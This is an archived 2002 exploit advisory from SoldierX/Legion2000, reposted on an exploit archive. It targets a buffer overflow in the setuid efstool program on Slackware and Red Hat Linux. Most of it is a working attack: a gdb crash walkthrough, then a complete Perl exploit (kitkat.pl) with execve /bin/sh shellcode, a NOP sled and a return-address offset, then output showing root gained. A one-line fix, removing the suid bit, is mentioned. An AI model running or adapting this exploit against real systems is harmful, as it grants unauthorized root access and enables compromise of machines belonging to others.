efstool.txt

efstool.txt: Posted Sep 12, 2002; Authored by NTFX | Site soldierx.com; Efstool local root exploit. A condition has been found in efstool which is shipped with Redhat and Slackware linux (and possibly other distributions) which, given the right environment, root privileges can be gained. Full research provided.; tags | exploit, local, root; systems | linux, redhat, slackware; SHA-256 | 35749dc21ecb4aaf67c6b4d31e62c494ff815452e4240da1bf2a8f9647bb5cab; Download | Favorite | View

efstool.txt

               §+++++++++++++++++++++++++++++++++++++++++++++++§
              ]|[        [-=- SOLDIERX.COM Presents -=-]      ]|[
+++++++++++++++§+++_________________________________________+++§+++++++++++++++
 \\////////////////     EFSTOOL LOCAL ROOT EXPLOIT      \\\\\\\\\\\\\\\\//
  \\\\\\\\\\\\\\\\\______________SLACKWARELINUX_____________/////////////////
   \\:::::::::::::::::::::::::::::::: by ::::::::::::::::::::::::::::::::://
    \\xxxxxxxxxxxxxxxxxxxxxxxx§-=-][-NTFX-][-=-§xxxxxxxxxxxxxxxxxxxxxxxxx//
     \\:::::::::::::::::::::::::::::: of ::::::::::::::::::::::::::::::://
      \\                  SOLDIERX.COM, LEGION2000                     //
       \\                      September, 2002                        //
        \\          NOBODY CAN STOP INFORMATION INSEMINATION         //
         §=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§
                   [ Author's E-mail - NTFX@SOLDIERX.COM ]
    **********************************************************************
    |  The author hereby grants permission to reproduce, redistribute,   |
    |  or include this file(s) in your file section, electronic or print |
    |  newletter, or any other form of transmission that you choose, as  |
    |  long as it is kept intact and whole, with no ommissions, delet-   |
    |  ions, or changes.  (C)2002 SOLDIERX.COM - http://www.soldierx.com |
    **********************************************************************

       [L2K Advisory ef0001]
      Feb 13th 02
        EFSTOOL LOCAL ROOT
       Author: ntfx <ntfx@legion2000.tk>
       Legion2000 Security Research (c)
       Soldierx Dot Com (c)
       Web:    http://legion200.security.nu
       Web:    http://soldierx.com
       Note: i have previously not written any
                     advisories so be patient.

What is Bonobo (contains the efstool package)

Bonobo is a set of language and system independant CORBA interfaces
for creating reusable components, controls and creating compound documents.

The Bonobo distribution includes a Gtk+ based implementation of the
Bonobo interfaces, enabling developers to create reusable
components and applications that can be used to form more complex documents.

There has been found a condition in efstool which is
shipped with redhat linux / slackware linux and possibly
others which given the right environment root
privilages can be gained. Dependant on suid permissions.

If a user prints 3000 "A" to the buffer this will
seg fault the program as shown below.

$ /usr/bin/efstool `perl -e 'print "A" x 3000'`
Segmentation fault

Now we proceed to open gdb on the item to view
what may have occured.

$gdb /usr/bin/efstool
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp            0xbfffe890    0xbfffe890
(gdb)

Here as you can see we are able to gain the return address.
Return : 0xbfffe890
when we get to the return address it will return to the nops and
continue down the code which will this execute a shell in our exploit.

The offset has to be played with for the exploit to work
effeciently but a offset of around -1000 / -2000 should
work.

I have done minimal testing on this, So if it doesnt work fully
do not come crying to me. It has been tested on slackware 7.1

Solution to this : remove suid permissions on the program
           #chmod u-s efstool

added: Do not confuse this with the other efstool release, Our version was semi released
   back in Feb 13th when the original discovery took place, I personally
   do not like using security focus for releases or have ever previously
   bothered with it. - ntfx 10.09

Included is the example exploit.
--------------------------cut kitkat.pl---------------------------------
#!/usr/bin/perl
# Efstool local root exploits (Slackware 8.1)
# Author: ntfx <ntfx@legion2000.tk> Feb 13th 2002
# Legion2000 Security Research (c)
# Soldierx Dot Com
# WEB: HTTP://legion2000.security.nu
# WEB: HTTP://soldierx.com
# GREET: Legion2000SR, Soldierx.com, Kat
############################################
# Solution: chmod u-s efstool
############################################
if(! $ARGV[0])
  {
   &usage;
   exit;
 }

sub usage() {
  print "USAGE: perl $0 <offset> kat\n";
  print "efstool local root by ntfx\n";
  print "Legion2000SR http://legion2000.security.nu\n";
  print "Soldierx    http://soldierx.com\n";
      exit(0); 
}

$ret       = "0xbfffe890";
$offset   = $ARGV[0];
$nop       = "\x90";
$ev1lc0de = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
        "\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
            "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
            "\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
            "/bin/sh";

  if ($ARGV[1] eq "kat") {
          $len = 3000;
          for ($i = 0; $i < ($len - length($ev1lc0de)); $i++) {
                  $buffer .= $nop;
          }
          $buffer .= $ev1lc0de;
  } 
$buffer .= pack('l', ($ret + $offset));
$buffer .= pack('l', ($ret + $offset));

# You will now be privilaged..
exec("/usr/bin/efstool $buffer");
sleep 2;
system("id; uname -a");
# This has been a SoldierX/Legion2000 Production.
--------------------------cut kitkat.pl---------------------------------

$ perl kitkat.pl kat
uid=0(root) gid=100(users) groups=100(users)
Linux efstool-exp 2.2.21 #1 Thu Jun 13 03:57:27 BST 2002 i586 unknown
#

As you can see root privilages have been gained and with the system exec it displays
the proven root uid and uname of the system.

ntfx <ntfx@legion2000.tk>
     _____________________________________________________________________
     §=------------------------------]-§-[------------------------------=§
      \\               THIS FILE WAS A SOLDIERX PRODUCTION             //
       \\                    http://www.soldierx.com                  //
        \\          NOBODY CAN STOP INFORMATION INSEMINATION         //
         §=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

efstool.txt

efstool.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

efstool.txt

Share This

efstool.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems